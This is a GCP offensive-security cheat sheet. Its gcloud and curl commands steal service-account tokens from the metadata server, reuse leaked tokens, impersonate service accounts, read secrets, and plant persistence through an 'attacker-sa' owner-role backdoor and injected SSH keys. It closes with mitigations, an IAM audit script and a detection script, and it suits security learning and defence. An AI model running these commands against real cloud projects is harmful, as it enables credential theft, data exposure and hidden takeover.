# GCP

### 1. GCP Cloud Overview

#### Core Components

* **Google Cloud IAM** – Identity and Access Management (users, service accounts, roles, policies).
* **Projects** – Organizational units that contain resources.
* **Service Accounts** – Identities for workloads (VMs, functions, apps).
* **Cloud Resource Hierarchy** – Org → Folders → Projects → Resources.

#### Planes of Access

* **Control Plane** – Google Cloud Console, Cloud SDK (`gcloud`), REST APIs.
* **Data Plane** – Actual workloads (VMs, buckets, databases).

🔑 **Security Insight**:

* Compromise of Control Plane creds = full takeover.
* Compromise of Service Account = privilege within project scope (but often escalatable).

***

### 2. Authentication & Credential Types

#### 2.1 User Accounts

* Human users with Google identities (`user@gmail.com`, `user@corp.com`).

#### 2.2 Service Accounts

* Non-human principals for apps/VMs.
* Auth via JSON key files or **Metadata Server**.

#### 2.3 Access Tokens

* OAuth2 bearer tokens (short-lived).
* Commonly abused via SSRF → metadata server.

**Get token inside VM**

```bash
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
```

***

### 3. Enumeration

#### 3.1 Identity Enumeration

Check current active account:

```bash
gcloud auth list
```

Get project ID:

```bash
gcloud config get-value project
```

List IAM policy for a project:

```bash
gcloud projects get-iam-policy <project-id> --format=json
```

Find specific service account roles:

```bash
gcloud projects get-iam-policy <project-id> --format=json \
  | jq -r --arg sa "serviceAccount:dev-sa@<project>.iam.gserviceaccount.com" \
      '.bindings[] | select(any(.members[]; . == $sa)) | .role'
```

***

#### 3.2 Service Account Enumeration

List all service accounts in a project:

```bash
gcloud iam service-accounts list --project <project-id>
```

Get details about a service account:

```bash
gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com
```

List keys associated with a service account:

```bash
gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com
```

***

#### 3.3 Storage Enumeration

List storage buckets:

```bash
gcloud storage buckets list --project <project-id>
```

List objects in a bucket:

```bash
gcloud storage objects list gs://<bucket-name>
```

Download file from bucket:

```bash
gcloud storage cp gs://<bucket-name>/<object> ./localfile
```

***

### 4. Exploitation

#### 4.1 Metadata Service Abuse (IMDS Equivalent)

Inside a VM, access metadata endpoint:

```bash
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
```

Use the token to authenticate. `gcloud` has no `activate-access-token` command; a bearer token is supplied through the `CLOUDSDK_AUTH_ACCESS_TOKEN` environment variable or the global `--access-token-file` flag:

```bash
export CLOUDSDK_AUTH_ACCESS_TOKEN=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  -H "Metadata-Flavor: Google" | jq -r .access_token)

# gcloud now sends the token from the environment with every call
gcloud compute instances list
```

***

#### 4.2 Using Leaked Tokens

If an attacker has a token (e.g., from logs or SSRF), pass it with the global `--access-token-file` flag (there is no `activate-access-token` command):

```bash
echo "<token>" > token.txt
gcloud projects list --access-token-file token.txt
```

Example (from CTF-like scenario):

```bash
gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt
```

***

#### 4.3 Privilege Escalation via Service Accounts

If SA has roles like `roles/iam.serviceAccountUser` or `roles/editor`, attacker can impersonate or escalate:

```bash
gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com
```
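The jq one-liner in 3.1 answers the question for one service account; the script below, an added least-privilege audit that is not part of the playbook, inverts the role-centric policy so every service account's roles can be reviewed at once and flags the escalation-capable roles named in 4.3. The sample policy and the `example-project` name are constructed.

```python
"""Audit a project IAM policy (the JSON returned by `gcloud projects get-iam-policy
<project-id> --format=json`) for service accounts holding escalation-capable roles.
Added example, not part of the playbook; the sample policy is constructed."""
import json

# Roles this page names as escalation enablers (Section 4.3), plus
# roles/iam.serviceAccountTokenCreator, the role --impersonate-service-account requires.
ESCALATION_ROLES = {"roles/owner", "roles/editor", "roles/iam.serviceAccountUser",
                    "roles/iam.serviceAccountTokenCreator"}

def roles_by_service_account(policy):
    """Map each serviceAccount: member to the roles bound to it.
    The policy is role-centric, so one SA can appear under many bindings.
    deleted:serviceAccount: members are skipped on purpose (they no longer grant anything)."""
    out = {}
    for binding in policy.get("bindings", []):
        # A conditional binding only grants the role while its CEL expression holds.
        tag = " (conditional)" if "condition" in binding else ""
        for member in binding.get("members", []):
            if member.startswith("serviceAccount:"):
                out.setdefault(member, set()).add(binding["role"] + tag)
    return out

def find_escalation_paths(policy):
    """Return sorted (member, role) pairs for every SA holding a risky role."""
    hits = []
    for member, roles in roles_by_service_account(policy).items():
        for role in roles:
            if role.split(" ")[0] in ESCALATION_ROLES:
                hits.append((member, role))
    return sorted(hits)

# Constructed sample policy: dev-sa is editor, ci-sa is a conditional serviceAccountUser.
SAMPLE_POLICY = json.loads("""{
  "bindings": [
    {"role": "roles/viewer", "members": ["user:dev@example.com",
        "serviceAccount:dev-sa@example-project.iam.gserviceaccount.com"]},
    {"role": "roles/editor",
     "members": ["serviceAccount:dev-sa@example-project.iam.gserviceaccount.com"]},
    {"role": "roles/iam.serviceAccountUser",
     "members": ["serviceAccount:ci-sa@example-project.iam.gserviceaccount.com"],
     "condition": {"title": "expires", "expression": "request.time < timestamp('2030-01-01T00:00:00Z')"}}
  ],
  "version": 3
}""")

if __name__ == "__main__":
    for member, role in find_escalation_paths(SAMPLE_POLICY):
        print(f"{member} -> {role}")
```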

***

### 5. Post-Exploitation

#### 5.1 Key Vaults / Secrets

If Cloud KMS or Secret Manager is accessible:

```bash
gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>
```

#### 5.2 BigQuery Data Dumping

BigQuery is driven through the `bq` CLI that ships with the Cloud SDK; `gcloud` itself has no `bigquery` command group:

```bash
bq ls --project_id=<project-id>                      # datasets in the project
bq ls --project_id=<project-id> <dataset>            # tables in a dataset
bq show --project_id=<project-id> <dataset>.<table>  # schema, row count, size
```

***

### 6. Lateral Movement

* Use compromised service account to pivot into other projects.
* Enumerate organization-level roles:

```bash
gcloud organizations get-iam-policy <org-id> --format=json
```

* Abuse roles like `roles/resourcemanager.folderViewer`, `roles/resourcemanager.projectMover` for movement.

***

### 7. Persistence

* Create new service account and assign roles:

```bash
gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
  --member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
  --role="roles/owner"
```

* Add SSH key to compromised VM instance:

```bash
gcloud compute instances add-metadata <vm-name> \
  --metadata ssh-keys="attacker:<public-key>"
```

***

### 8. Detection & Mitigation

* **Monitor IAM policy changes** (Cloud Audit Logs).
* **Restrict service account privileges** (principle of least privilege).
* **Restrict metadata access** (firewall, no public SSRF exposure).
* **Rotate keys/tokens frequently**.
* **Enable VPC Service Controls** to limit lateral movement.
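The first bullet in practice: a detection pass over Cloud Audit Log entries that flags the exact steps this page lists (the `roles/owner` grant and `ssh-keys` metadata change from Section 7, and service account key creation from 2.2). This is an added example, not the playbook's own tooling; the sample entries are constructed and the field names (`protoPayload.serviceData.policyDelta.bindingDeltas`, `protoPayload.metadata.instanceMetadataDelta`) are assumed to follow the documented Admin Activity log layout.

```python
"""Flag Cloud Audit Log entries matching the escalation and persistence steps on this page.
Added example, not part of the playbook; sample entries are constructed."""
import json

# Roles the page names as escalation (4.3) and persistence (7) targets.
RISKY_ROLES = {"roles/owner", "roles/editor", "roles/iam.serviceAccountUser"}

def check_entry(entry):
    """Return a list of alert strings for one audit log entry (empty if nothing matched)."""
    p = entry.get("protoPayload", {})
    method = p.get("methodName", "")
    actor = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
    target = p.get("resourceName", "unknown")
    alerts = []
    # 1. IAM policy change that ADDs a risky role (Section 7 persistence via add-iam-policy-binding).
    if method.endswith("SetIamPolicy"):
        for d in p.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", []):
            if d.get("action") == "ADD" and d.get("role") in RISKY_ROLES:
                alerts.append(f"{actor} granted {d['role']} to {d.get('member')} on {target}")
    # 2. New user-managed key for a service account (JSON key files, Section 2.2).
    if method == "google.iam.admin.v1.CreateServiceAccountKey":
        alerts.append(f"{actor} created a key for {target}")
    # 3. ssh-keys metadata added or changed on a VM (Section 7 persistence via add-metadata).
    if method.endswith("compute.instances.setMetadata"):
        delta = p.get("metadata", {}).get("instanceMetadataDelta", {})
        touched = set(delta.get("addedMetadataKeys", [])) | set(delta.get("modifiedMetadataKeys", []))
        if "ssh-keys" in touched:
            alerts.append(f"{actor} changed ssh-keys on {target}")
    return alerts

def scan(log_lines):
    """Run check_entry over newline-delimited JSON as exported from Cloud Logging."""
    alerts = []
    for line in log_lines:
        if line.strip():
            alerts.extend(check_entry(json.loads(line)))
    return alerts

# Constructed sample: a benign list call, an owner grant to a new SA, and an ssh-keys change.
SAMPLE_LOG = """
{"protoPayload": {"methodName": "google.iam.admin.v1.ListServiceAccounts", "authenticationInfo": {"principalEmail": "dev@example.com"}, "resourceName": "projects/example-project"}}
{"protoPayload": {"methodName": "SetIamPolicy", "authenticationInfo": {"principalEmail": "dev-sa@example-project.iam.gserviceaccount.com"}, "resourceName": "projects/example-project", "serviceData": {"policyDelta": {"bindingDeltas": [{"action": "ADD", "role": "roles/owner", "member": "serviceAccount:attacker-sa@example-project.iam.gserviceaccount.com"}]}}}}
{"protoPayload": {"methodName": "v1.compute.instances.setMetadata", "authenticationInfo": {"principalEmail": "dev-sa@example-project.iam.gserviceaccount.com"}, "resourceName": "projects/example-project/zones/us-central1-a/instances/web-1", "metadata": {"instanceMetadataDelta": {"addedMetadataKeys": ["ssh-keys"]}}}}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print("ALERT:", alert)
```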

